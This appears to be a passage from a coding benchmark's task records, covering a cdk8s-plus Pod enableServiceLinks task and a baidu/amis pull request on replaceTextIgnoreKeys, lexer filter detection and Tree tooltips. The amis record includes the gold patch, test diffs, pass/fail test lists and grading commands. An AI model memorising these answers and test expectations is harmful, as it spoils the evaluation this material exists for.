namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", 
"can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "Can mutate metadata", "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaults", "custom", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and 
a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "default configuration", "custom configuration", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed 
namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "small size", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure 
identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", 
"addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource 
CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can select namespaces", "can select all namespaces", "Can be imported from secret name", "Can create a new secret", "Can add data 
to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", 
"can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
Method: Pod.constructor(scope: Construct, id: string, props: PodProps) Location: src/pod.ts Inputs: - **scope**: Construct – the construct tree parent. - **id**: string – logical ID of the pod. - **props**: PodProps – pod configuration object, now includes an optional `enableServiceLinks?: boolean` (default `true`). When set to `false`, the generated pod spec will have `enableServiceLinks: false`. Outputs: - A Kubernetes Pod resource whose synthesized spec contains the `enableServiceLinks` field reflecting the value passed in `props`. If `false` is provided, `spec.enableServiceLinks` will be falsy in the synthesized manifest. Description: Constructs a Pod with standard configuration options and the new `enableServiceLinks` flag that controls whether Kubernetes injects service‑link environment variables into the pod’s containers.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 12, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/sorenlouv/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/5471" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests backporting support for the `enableServiceLinks` flag on Pods, and the test asserts that disabling it results in `spec.enableServiceLinks` being falsy. The test aligns with the implied requirement, and no unrelated test dependencies or hidden expectations are present. There are no signals of B‑category problems, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f531d7df16ec08fce902faed92b5017a11c2f771
2023-10-26 08:36:31
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8510
diff --git a/docs/zh-CN/start/getting-started.md b/docs/zh-CN/start/getting-started.md index ff6b2ad74..9fac584e3 100644 --- a/docs/zh-CN/start/getting-started.md +++ b/docs/zh-CN/start/getting-started.md @@ -759,8 +759,7 @@ let amisScoped = amis.embed( { replaceText: { service: 'http://localhost' - }, - replaceTextKeys: ['api'] + } } ); ``` @@ -779,6 +778,29 @@ type, name, mode, target, reload 如果发现有字段被意外替换了,可以通过设置这个属性来避免 +通过字符串数组或者函数来过滤字段,比如: + +```javascript +let amisScoped = amis.embed( + '#root', + { + type: 'page', + body: { + type: 'service', + api: 'service/api' + } + }, + {}, + { + replaceText: { + service: 'http://localhost' + }, + // replaceTextIgnoreKeys: ['api'], + replaceTextIgnoreKeys: key => key === 'api' + } +); +``` + #### toastPosition Toast 提示弹出位置,默认为`'top-center'`。 diff --git a/packages/amis-core/package.json b/packages/amis-core/package.json index a5b5d4ca5..e8834b56e 100644 --- a/packages/amis-core/package.json +++ b/packages/amis-core/package.json @@ -61,7 +61,8 @@ "react-intersection-observer": "9.5.2", "react-json-view": "1.21.3", "tslib": "^2.3.1", - "uncontrollable": "7.2.1" + "uncontrollable": "7.2.1", + "path-to-regexp": "6.2.0" }, "peerDependencies": { "amis-formula": "*", diff --git a/packages/amis-core/src/env.tsx b/packages/amis-core/src/env.tsx index e63b9c289..830f41098 100644 --- a/packages/amis-core/src/env.tsx +++ b/packages/amis-core/src/env.tsx @@ -131,7 +131,9 @@ export interface RendererEnv { /** * 文本替换的黑名单,因为属性太多了所以改成黑名单的 flags */ - replaceTextIgnoreKeys?: String[]; + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean); /** * 解析url参数 diff --git a/packages/amis-core/src/utils/replaceText.ts b/packages/amis-core/src/utils/replaceText.ts index 42c3e6925..2b5c630c2 100644 --- a/packages/amis-core/src/utils/replaceText.ts +++ b/packages/amis-core/src/utils/replaceText.ts @@ -7,20 +7,31 @@ import {isObject, JSONTraverse} from './helper'; export function replaceText( schema: any, 
replaceText?: {[propName: string]: string}, - replaceTextIgnoreKeys?: String[] + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean) ) { // 进行文本替换 if (replaceText && isObject(replaceText)) { let replicaSchema = cloneDeep(schema); const replaceKeys = Object.keys(replaceText); replaceKeys.sort((a, b) => b.length - a.length); // 避免用户将短的放前面 - const IgnoreKeys = new Set(replaceTextIgnoreKeys || []); + const IgnoreKeys = new Set( + Array.isArray(replaceTextIgnoreKeys) ? replaceTextIgnoreKeys : [] + ); + const ignore = + typeof replaceTextIgnoreKeys === 'function' + ? replaceTextIgnoreKeys + : (key: string) => { + return IgnoreKeys.has(key); + }; + JSONTraverse(replicaSchema, (value: any, key: string, object: any) => { const descriptor = Object.getOwnPropertyDescriptor(object, key); if ( typeof value === 'string' && - !IgnoreKeys.has(key) && - descriptor?.writable + descriptor?.writable && + !ignore(key, value, object) ) { for (const replaceKey of replaceKeys) { if (~value.indexOf(replaceKey)) { diff --git a/packages/amis-formula/src/lexer.ts b/packages/amis-formula/src/lexer.ts index c48b878c4..18a5288ae 100644 --- a/packages/amis-formula/src/lexer.ts +++ b/packages/amis-formula/src/lexer.ts @@ -1,3 +1,4 @@ +import {getFilters} from './filter'; import {LexerOptions, Token, TokenTypeName} from './types'; export const enum TokenEnum { @@ -171,16 +172,25 @@ function formatNumber(value: string) { return Number(value); } -export function lexer(input: string, options?: LexerOptions) { +export function lexer(input: string, options: LexerOptions = {}) { let line = 1; let column = 1; let index = 0; let mainState = mainStates.START; const states: Array<any> = [mainState]; let tokenCache: Array<Token> = []; - const allowFilter = options?.allowFilter !== false; + options = {...options}; + const allowFilter = options.allowFilter !== false; - if (options?.evalMode || options?.variableMode) { + if (!options.isFilter) { + const filterKeys = 
Object.keys(getFilters()); + if ((options as any).filters) { + filterKeys.push(...Object.keys((options as any).filters)); + } + options.isFilter = (name: string) => filterKeys.includes(name); + } + + if (options.evalMode || options.variableMode) { pushState(mainStates.EXPRESSION); } @@ -370,6 +380,16 @@ export function lexer(input: string, options?: LexerOptions) { token.value === '|' && allowFilter ) { + // 怎么区分是过滤还是位运算呢? + // 靠外面反馈吧 + if (options?.isFilter) { + const restInput = input.substring(token.start.index + 1).trim(); + const m = /^[A-Za-z0-9_$@][A-Za-z0-9_\-$@]*/.exec(restInput); + if (!m || !options.isFilter(m[0])) { + return token; + } + } + pushState(mainStates.Filter); return { type: TokenName[TokenEnum.OpenFilter], diff --git a/packages/amis-formula/src/types.ts b/packages/amis-formula/src/types.ts index 39c967bff..a675707ff 100644 --- a/packages/amis-formula/src/types.ts +++ b/packages/amis-formula/src/types.ts @@ -61,6 +61,8 @@ export interface LexerOptions { * ${abc | html} */ allowFilter?: boolean; + + isFilter?: (name: string) => boolean; } export type TokenTypeName = diff --git a/packages/amis-ui/scss/components/form/_tree.scss b/packages/amis-ui/scss/components/form/_tree.scss index 397dc5d1e..7f6feee9f 100644 --- a/packages/amis-ui/scss/components/form/_tree.scss +++ b/packages/amis-ui/scss/components/form/_tree.scss @@ -199,6 +199,7 @@ height: var(--Tree-itemHeight); line-height: var(--Tree-itemHeight); padding-right: var(--Tree-icon-gap); + flex-shrink: 0; > a { display: inline-block; @@ -359,7 +360,6 @@ &-itemText { cursor: pointer; - flex: 1 auto; display: inline-block; color: var(--inputTree-base-default-color); font-size: var(--select-tree-fontSize); diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 5766cbf71..047bf6c93 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -37,6 +37,7 @@ import {LocaleProps, localeable} from 
'amis-core'; import Spinner, {SpinnerExtraProps} from './Spinner'; import {ItemRenderStates} from './Selection'; import VirtualList from './virtual-list'; +import TooltipWrapper from './TooltipWrapper'; interface IDropIndicator { left: number; @@ -1275,33 +1276,42 @@ export class TreeSelector extends React.Component< !(item.defer && !item.loaded) ? ( <div className={cx('Tree-item-icons')}> {creatable && hasAbility(item, 'creatable') ? ( - <a - onClick={this.handleAdd.bind(this, item)} - data-tooltip={__(createTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(createTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="plus" className="icon" /> - </a> + <a onClick={this.handleAdd.bind(this, item)}> + <Icon icon="plus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {removable && hasAbility(item, 'removable') ? ( - <a - onClick={this.handleRemove.bind(this, item)} - data-tooltip={__(removeTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(removeTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="minus" className="icon" /> - </a> + <a onClick={this.handleRemove.bind(this, item)}> + <Icon icon="minus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {editable && hasAbility(item, 'editable') ? ( - <a - onClick={this.handleEdit.bind(this, item)} - data-tooltip={__(editTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(editTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="new-edit" className="icon" /> - </a> + <a onClick={this.handleEdit.bind(this, item)}> + <Icon icon="new-edit" className="icon" /> + </a> + </TooltipWrapper> ) : null} </div> ) : null}
feat: env.replaceTextIgnoreKeys 支持函数 Close: #7035 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 55473df</samp> This pull request improves the `replaceText` feature and its documentation. It allows users to filter keys and values with a custom function, and updates the docs and types accordingly. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 55473df</samp> > _If you want to replace text with ease_ > _You can use the `replaceText` feature, please_ > _But if some keys you want to skip_ > _You can pass a function, not just a list_ > _To the option `replaceTextIgnoreKeys`_ ### Why Close: #7035 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 55473df</samp> * Remove `replaceTextKeys` option from `replaceText` documentation ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacL757-R757)) * Add example of using a function to filter keys for `replaceText` feature ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacR776-R798)) * Update `RendererEnv` interface to accept a function for `replaceTextIgnoreKeys` option ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-62f2e14b837dfa7b7f5f94ee2a856825f211639ddf0f85d783c666dbcd7f8d0dL123-R123)) * Refactor `replaceText` function to use `ignore` function instead of a set of strings ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L10-R10), [link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L17-R32))
**Title** Enhance replaceText ignore‑keys flexibility, refine formula lexer filtering, and unify Tree tooltip handling **Problem** `replaceText` could only skip keys via a static string list, limiting dynamic scenarios. The documentation did not reflect newer usage. Additionally, the formula lexer could not reliably differentiate filter syntax, and the Tree component relied on legacy tooltip attributes and had a layout issue. **Root Cause** The ignore‑keys logic was hard‑coded to a Set of strings, and the lexer lacked a customizable filter predicate. The Tree UI used raw data‑tooltip attributes and an unnecessary flex rule, leading to inconsistent tooltips and layout quirks. **Fix / Expected Behavior** - `replaceTextIgnoreKeys` now accepts either a string array or a predicate function that determines at runtime which keys to ignore. - Existing array‑based usage remains fully functional. - Documentation and type definitions are updated to show and type the new function option with an example. - The lexer options gain an `isFilter` callback, allowing precise identification of filter expressions while preserving current parsing behavior. - Tree action icons (`add`, `remove`, `edit`) are wrapped with the shared `TooltipWrapper` component, providing consistent hover tooltips. - Tree item styling is corrected: the icon container is prevented from shrinking, and the unnecessary flex rule on item text is removed. **Risk & Validation** - Run the full test suite and specifically verify that schemas using array‑based `replaceTextIgnoreKeys` continue to produce correct replacements. - Add/execute lexer tests to confirm filter parsing is unchanged when `isFilter` is omitted and works as intended when supplied. - Perform visual regression testing on the Tree component to ensure tooltips appear correctly and layout remains stable.
8,510
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index fb30171c4..32d23b1e5 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -580,3 +580,9 @@ test('evalute:namespace', () => { expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); }); + +test('evalute:speical characters', () => { + // 优先识别成位运算,而不是过滤器 + expect(evaluate('${1 | 2}', {})).toBe(3); + expect(evaluate('${1 | abc}', {abc: 2})).toBe(3); +}); diff --git a/packages/amis-formula/__tests__/lexer.test.ts b/packages/amis-formula/__tests__/lexer.test.ts index 773032b1d..e431f3d24 100644 --- a/packages/amis-formula/__tests__/lexer.test.ts +++ b/packages/amis-formula/__tests__/lexer.test.ts @@ -31,13 +31,19 @@ test('lexer:simple', () => { test('lexer:filter', () => { expect( getTokens('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false + evalMode: false, + filters: { + date() {} + } }) ).toMatchSnapshot(); expect( getTokens('\\$abc is ${abc | isTrue : trueValue : falseValue}', { - evalMode: false + evalMode: false, + filters: { + isTrue() {} + } }) ).toMatchSnapshot(); }); @@ -55,7 +61,10 @@ test('lexer:exception', () => { expect(() => getTokens('${a | filter: \\x2}', { - evalMode: false + evalMode: false, + filters: { + filter() {} + } }) ).toThrow('Unexpected token x in 1:17'); }); diff --git a/packages/amis-formula/__tests__/parser.test.ts b/packages/amis-formula/__tests__/parser.test.ts index fa87d1fbb..4c618fa1f 100644 --- a/packages/amis-formula/__tests__/parser.test.ts +++ b/packages/amis-formula/__tests__/parser.test.ts @@ -1,3 +1,4 @@ +import moment from 'moment'; import {parse} from '../src/index'; test('parser:simple', () => { @@ -120,8 +121,12 @@ test('parser:filter', () => { test('parser:filter-escape', () => { expect( parse('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - 
evalMode: false - }) + evalMode: false, + filters: { + date: (input: any, format = 'LLL', inputFormat = 'X') => + moment(input, inputFormat).format(format) + } + } as any) ).toMatchSnapshot(); }); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index d87b14148..84cec19c7 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -2061,10 +2061,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2100,10 +2097,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2725,10 +2719,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2764,10 +2755,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus"
[ "evalute:speical characters" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "evalute:keywords", "evalute:Math", "evalute:namespace" ]
Method: lexer(input: string, options: LexerOptions = {}) Location: packages/amis-formula/src/lexer.ts Inputs: - **input**: the formula string to be tokenised. - **options** (optional): an object of type `LexerOptions` that may contain * `evalMode?: boolean` – treat the input as an expression. * `variableMode?: boolean` – treat the input as a variable reference. * `allowFilter?: boolean` – when `false` disables the `|` filter operator (defaults to `true`). * `filters?: Record<string, Function>` – a map of custom filter implementations; their names are added to the internal filter list. * `isFilter?: (name: string) => boolean` – custom predicate to decide whether an identifier after `|` is a filter; if omitted, the lexer builds a predicate from the built‑in filters plus any user‑provided `filters`. Outputs: `Token[]` – an ordered list of lexical tokens. The token stream respects the new `isFilter` logic, so a `|` token is returned as a bitwise‑OR operator when the following identifier is not recognised as a filter. Description: Lexes a formula expression into tokens with extended configurability. The function now always receives an options object (defaulted to `{}`), automatically builds a filter‑recognition predicate from built‑in and user‑supplied filters, and allows callers to supply a custom `isFilter` callback to disambiguate the pipe character (`|`) between filter syntax and bitwise‑or operations. Interface: LexerOptions Location: packages/amis-formula/src/types.ts Inputs: - `allowFilter?: boolean` – keep existing behaviour. - `isFilter?: (name: string) => boolean` – **new** optional property allowing callers to provide a custom function that determines whether a token name after a pipe (`|`) should be treated as a filter. Outputs: none (type definition). Description: Configuration object passed to `lexer`. 
The addition of `isFilter` enables callers (e.g., tests) to control filter detection when the lexer processes the `|` operator, which is required for the new test cases that verify correct handling of special characters.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
